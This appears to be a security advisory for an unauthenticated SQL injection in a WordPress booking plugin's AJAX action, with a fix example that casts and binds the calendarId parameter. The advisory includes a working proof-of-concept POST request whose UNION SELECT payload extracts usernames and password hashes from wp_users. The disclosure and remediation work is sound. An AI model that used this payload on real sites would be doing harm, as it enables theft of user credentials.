The AJAX action abc_booking_getBookingResult, available to both authenticated and unauthenticated users, did not sanitise the calendarId parameter, which was then concatenated into a SQL statement, leading to an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed passwords, usernames and email addresses.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Cookie:
cache-control: no-cache

calendarId=1)+UNION+SELECT+1%2Cuser_login%2C3%2C4%2C5%2C6%2C7%2C2%2Cuser_pass+FROM+wp_users+WHERE+ID%3D1+and+ID+IN+(+1+&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult
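The following is an added example of how such a handler is fixed; it is not the plugin's own code, and the handler name, column names and the abc_bookings table are assumed. The action name and request parameters come from the advisory: the value is cast to an integer and bound through $wpdb->prepare() instead of being concatenated into the query.

```php
<?php
// Added example, not the plugin's code. Handler, columns and table name are assumed.

// Registering both wp_ajax_ and wp_ajax_nopriv_ exposes the handler to
// unauthenticated visitors, so its input handling must be strict.
add_action( 'wp_ajax_abc_booking_getBookingResult', 'example_booking_result' );
add_action( 'wp_ajax_nopriv_abc_booking_getBookingResult', 'example_booking_result' );

function example_booking_result() {
    global $wpdb;

    // Vulnerable pattern described in the advisory: the raw request value is
    // concatenated into the statement, so a value such as "1) UNION SELECT ..."
    // changes the structure of the query rather than just its data.
    //   $calendar_id = $_POST['calendarId'];
    //   $sql = "SELECT ... WHERE (calendar_id = " . $calendar_id . ") ...";

    // Hardened form: enforce the expected type, then bind the value with a
    // placeholder so it can never be interpreted as SQL.
    $calendar_id = isset( $_POST['calendarId'] ) ? absint( $_POST['calendarId'] ) : 0;
    $from        = isset( $_POST['from'] ) ? sanitize_text_field( wp_unslash( $_POST['from'] ) ) : '';
    $to          = isset( $_POST['to'] ) ? sanitize_text_field( wp_unslash( $_POST['to'] ) ) : '';

    if ( $calendar_id <= 0 || ! example_is_ymd( $from ) || ! example_is_ymd( $to ) ) {
        wp_send_json_error( 'invalid parameters', 400 );
    }

    $table = $wpdb->prefix . 'abc_bookings'; // assumed table name
    $rows  = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, title, start_date, end_date FROM {$table}
             WHERE calendar_id = %d AND start_date >= %s AND end_date <= %s",
            $calendar_id,
            $from,
            $to
        )
    );

    wp_send_json_success( $rows );
}

// The dates are bound as strings, so validate their format rather than trusting them.
function example_is_ymd( $value ) {
    return (bool) preg_match( '/^\d{4}-\d{2}-\d{2}$/', $value );
}
```

With the integer cast in place, the payload shown above collapses to calendarId=1, and the bound placeholders ensure the remaining parameters cannot alter the statement.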
Lenon Leite
Yes
2020-10-22 (about 2 years ago)